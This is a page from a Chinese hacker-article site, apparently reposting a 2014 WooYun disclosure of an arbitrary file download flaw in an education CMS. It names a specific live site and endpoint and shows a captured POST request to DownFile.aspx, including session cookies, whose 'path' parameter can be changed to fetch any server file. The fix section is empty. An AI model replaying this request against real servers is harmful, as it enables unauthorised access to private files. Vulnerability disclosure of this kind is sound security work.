记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

某用户量特别大的教育类CMS存在任意文件下载

2014-12-24 06:00

漏洞页面:http://www.hbycscjzx.com//OperationManage/DownFile.aspx

首先注册一个普通账户

在个人中心写站内消息的时候插入附件抓包。可以看到以下内容

code 区域
POST /OperationManage/DownFile.aspx HTTP/1.1

Host: www.hbycscjzx.com

Proxy-Connection: Keep-Alive

Content-Length: 114

Pragma: no-cache

Cache-Control: no-cache

Accept: */*

Accept-Language: zh-CN

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SE 2.X MetaSr 1.0)

Referer: http://www.hbycscjzx.com/BlogManage/Message/SendMessage.aspx

Accept-Encoding: gzip, deflate

Cookie: ASP.NET_SessionId=5gjdmhzyg2rskqaecq3pk455; GrowUpEdu_RecordStatTimeCookie_Site=GrowUpEdu_RecordStatTimeCookie_Site_value=GrowUpEdu_RecordStatTimeCookie_Site; GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608=GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608_value=GrowUpEdu_RecordStatTimeCookie_SystemArticleStat_608; GrowUpEdu=9713DA293A50EEDE01610061006100610061000000E158DDAAEAD7CF0100E1902AD003D8CF0142006C006F0067004000390065003400340038003000610061002D0037006300360035002D0034003600350030002D0061006500370032002D0037003900360066006500330065003200340064006200370000002F000000; MyHomeNav=personal



path=myhome.aspx&name=index.aspx



里面有一个path。。修改path内容即可任意下载

漏洞证明:

QQ图片20140924194910.jpg



QQ图片20140924195011.jpg

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2014-077210

阅读:144670 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“某用户量特别大的教育类CMS存在任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁